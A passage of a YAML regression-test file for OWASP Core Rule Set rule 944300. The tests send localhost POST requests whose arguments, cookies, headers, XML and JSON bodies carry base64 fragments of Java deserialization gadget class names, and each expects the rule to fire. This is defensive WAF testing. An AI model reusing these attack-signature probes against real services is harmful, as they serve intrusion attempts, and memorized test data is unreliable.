dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-249 + desc: "XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-250 + desc: "Nested XML element value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-251 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: 
"test=HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-252 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-253 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZWNsb25lZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZWNsb25lZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-254 + desc: "Argument test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-255 + desc: "Argument name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + 
stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-256 + desc: "Cookie test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-257 + desc: "Cookie name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-258 + desc: "Request header test includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-259 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-260 + desc: "XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-261 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + 
data: "Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-262 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-263 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-264 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVjbG9uZWZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-265 + desc: "Argument test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: 
+ - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-266 + desc: "Argument name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-267 + desc: "Cookie test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-268 + desc: "Cookie name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-269 + desc: "Request header test includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-270 + desc: "XML attribute value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-271 + desc: "XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-272 + desc: "Nested XML element value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-273 + desc: "Content-Type text/plain includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-274 + desc: "Content-Type application/json arg value includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\"}" + output: + log_contains: 
"id \"944300\"" + - test_title: 944300-275 + desc: "Content-Type application/json arg name includes keyword cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvdG90eXBlc2VyaWFsaXphdGlvbmZhY3Rvcnk\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-276 + desc: "Argument test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-277 + desc: "Argument name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-278 + desc: "Cookie test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-279 + desc: "Cookie name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-280 + desc: "Request header test includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-281 + desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP 
CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + 
method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-287 + desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id 
\"944300\"" + - test_title: 944300-288 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "Request header test includes keyword 
Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + 